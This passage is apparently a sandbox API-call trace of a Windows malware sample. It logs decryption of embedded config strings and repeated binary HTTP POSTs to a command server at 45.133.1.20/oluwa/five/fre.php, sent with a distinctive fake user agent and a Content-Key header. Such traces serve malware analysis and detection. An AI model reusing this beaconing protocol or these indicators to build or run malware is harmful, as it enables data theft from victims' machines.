pbData=0x418960, dwFlags=0x0) returned 1 [0176.880] GetProcessHeap () returned 0x6a0000 [0176.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6788 | out: hHeap=0x6a0000) returned 1 [0176.881] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.882] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0176.884] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.884] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0176.885] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.885] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0176.885] GetProcessHeap () returned 0x6a0000 [0176.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0176.886] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0176.886] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0176.887] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0176.887] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0176.888] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0176.888] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0176.889] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0176.889] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0176.889] GetProcessHeap () returned 0x6a0000 [0176.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0176.890] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0176.890] GetProcessHeap () returned 0x6a0000 [0176.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0176.891] GetProcessHeap () returned 0x6a0000 [0176.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0176.891] GetProcessHeap () returned 0x6a0000 [0176.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0176.893] GetProcessHeap () returned 0x6a0000 [0176.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0176.893] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.894] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0176.900] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.900] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0176.907] GetProcessHeap () returned 0x6a0000 [0176.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b9ab8 [0176.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.908] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b9ab8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0176.909] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.909] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0176.910] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.910] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0176.910] GetProcessHeap () returned 0x6a0000 [0176.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9ab8 | out: hHeap=0x6a0000) returned 1 [0176.911] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.951] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0176.951] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.952] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0176.996] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.997] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0176.997] GetProcessHeap () returned 0x6a0000 [0176.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0176.997] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0176.998] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0176.998] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0176.999] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0176.999] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.000] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0177.000] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.001] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0177.001] GetProcessHeap () returned 0x6a0000 [0177.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0177.001] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9a50*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be988*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0177.001] GetProcessHeap () returned 0x6a0000 [0177.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baad0 [0177.001] socket (af=2, type=1, protocol=6) returned 0x3a4 [0177.001] connect (s=0x3a4, name=0x6be988*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0177.027] FreeAddrInfoW (pAddrInfo=0x6b9a50*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be988*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0177.027] GetProcessHeap () returned 0x6a0000 [0177.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0177.027] GetProcessHeap () returned 0x6a0000 [0177.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0177.028] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0177.029] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0177.029] GetProcessHeap () returned 0x6a0000 [0177.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0177.029] GetProcessHeap () returned 0x6a0000 [0177.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0177.029] GetProcessHeap () returned 0x6a0000 [0177.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0177.029] GetProcessHeap () returned 0x6a0000 [0177.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0177.030] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0177.031] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0177.031] GetProcessHeap () returned 0x6a0000 [0177.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0177.031] GetProcessHeap () returned 0x6a0000 [0177.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0177.031] send (s=0x3a4, buf=0x6bbd20*, len=242, flags=0) returned 242 [0177.032] send (s=0x3a4, buf=0x6bb998*, len=159, flags=0) returned 159 [0177.032] GetProcessHeap () returned 0x6a0000 [0177.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0177.032] recv (in: s=0x3a4, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0177.117] GetProcessHeap () returned 0x6a0000 [0177.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0177.118] GetProcessHeap () returned 0x6a0000 [0177.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0177.121] GetProcessHeap () returned 0x6a0000 [0177.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0177.122] GetProcessHeap () returned 0x6a0000 [0177.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0177.122] closesocket (s=0x3a4) returned 0 [0177.123] GetProcessHeap () returned 0x6a0000 [0177.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baad0 | out: hHeap=0x6a0000) returned 1 [0177.124] GetProcessHeap () returned 0x6a0000 [0177.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0177.124] GetProcessHeap () returned 0x6a0000 [0177.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0177.125] GetProcessHeap () returned 0x6a0000 [0177.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0177.125] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc10) returned 0x3a4 [0177.128] Sleep (dwMilliseconds=0xea60) [0177.132] GetProcessHeap () returned 0x6a0000 [0177.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0177.133] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.134] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0177.140] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.141] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0177.156] GetProcessHeap () returned 0x6a0000 [0177.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0177.157] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.157] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0177.158] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.159] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0177.159] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.160] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0177.160] GetProcessHeap () returned 0x6a0000 [0177.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0177.161] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.161] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0177.162] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.162] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0177.167] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.167] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0177.167] GetProcessHeap () returned 0x6a0000 [0177.167] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0177.174] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.174] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0177.175] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.175] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0177.176] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.176] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0177.177] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.177] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0177.177] GetProcessHeap () returned 0x6a0000 [0177.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0177.178] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0177.178] GetProcessHeap () returned 0x6a0000 [0177.178] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0177.178] GetProcessHeap () returned 0x6a0000 [0177.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0177.179] GetProcessHeap () returned 0x6a0000 [0177.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0177.180] GetProcessHeap () returned 0x6a0000 [0177.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0177.181] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.181] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0177.191] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.191] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0177.203] GetProcessHeap () returned 0x6a0000 [0177.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0177.204] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.205] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0177.206] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.206] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0177.210] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.211] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0177.211] GetProcessHeap () returned 0x6a0000 [0177.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0177.213] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.213] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0177.214] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.215] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0177.217] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.218] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0177.218] GetProcessHeap () returned 0x6a0000 [0177.218] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0177.219] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.219] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0177.220] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.221] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0177.221] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.222] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0177.222] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.223] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0177.223] GetProcessHeap () returned 0x6a0000 [0177.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0177.223] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9eb0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea30*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0177.223] GetProcessHeap () returned 0x6a0000 [0177.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9a0 [0177.223] socket (af=2, type=1, protocol=6) returned 0x3a8 [0177.224] connect (s=0x3a8, name=0x6bea30*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0177.255] FreeAddrInfoW (pAddrInfo=0x6b9eb0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea30*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0177.255] GetProcessHeap () returned 0x6a0000 [0177.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0177.255] GetProcessHeap () returned 0x6a0000 [0177.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0177.259] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0177.260] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0177.260] GetProcessHeap () returned 0x6a0000 [0177.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0177.261] GetProcessHeap () returned 0x6a0000 [0177.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0177.262] GetProcessHeap () returned 0x6a0000 [0177.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0177.262] GetProcessHeap () returned 0x6a0000 [0177.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0177.264] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0177.266] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0177.267] GetProcessHeap () returned 0x6a0000 [0177.267] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0177.267] GetProcessHeap () returned 0x6a0000 [0177.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0177.267] send (s=0x3a8, buf=0x6bbd20*, len=242, flags=0) returned 242 [0177.268] send (s=0x3a8, buf=0x6bb998*, len=159, flags=0) returned 159 [0177.268] GetProcessHeap () returned 0x6a0000 [0177.268] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0177.268] recv (in: s=0x3a8, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0177.341] GetProcessHeap () returned 0x6a0000 [0177.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0177.342] GetProcessHeap () returned 0x6a0000 [0177.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0177.343] GetProcessHeap () returned 0x6a0000 [0177.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0177.344] GetProcessHeap () returned 0x6a0000 [0177.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0177.345] closesocket (s=0x3a8) returned 0 [0177.346] GetProcessHeap () returned 0x6a0000 [0177.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9a0 | out: hHeap=0x6a0000) returned 1 [0177.346] GetProcessHeap () returned 0x6a0000 [0177.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0177.347] GetProcessHeap () returned 0x6a0000 [0177.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0177.347] GetProcessHeap () returned 0x6a0000 [0177.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0177.348] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1390) returned 0x3a8 [0177.350] Sleep (dwMilliseconds=0xea60) [0177.352] GetProcessHeap () returned 0x6a0000 [0177.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0177.353] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.353] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0177.361] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.361] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0177.371] GetProcessHeap () returned 0x6a0000 [0177.371] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b9938 [0177.372] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.372] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b9938, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0177.373] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.373] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0177.374] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.375] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0177.375] GetProcessHeap () returned 0x6a0000 [0177.375] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9938 | out: hHeap=0x6a0000) returned 1 [0177.377] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.377] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0177.386] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.386] CryptDestroyKey (hKey=0x6ad020) returned 1 [0177.387] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.388] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0177.388] GetProcessHeap () returned 0x6a0000 [0177.388] RtlAllocateHeap 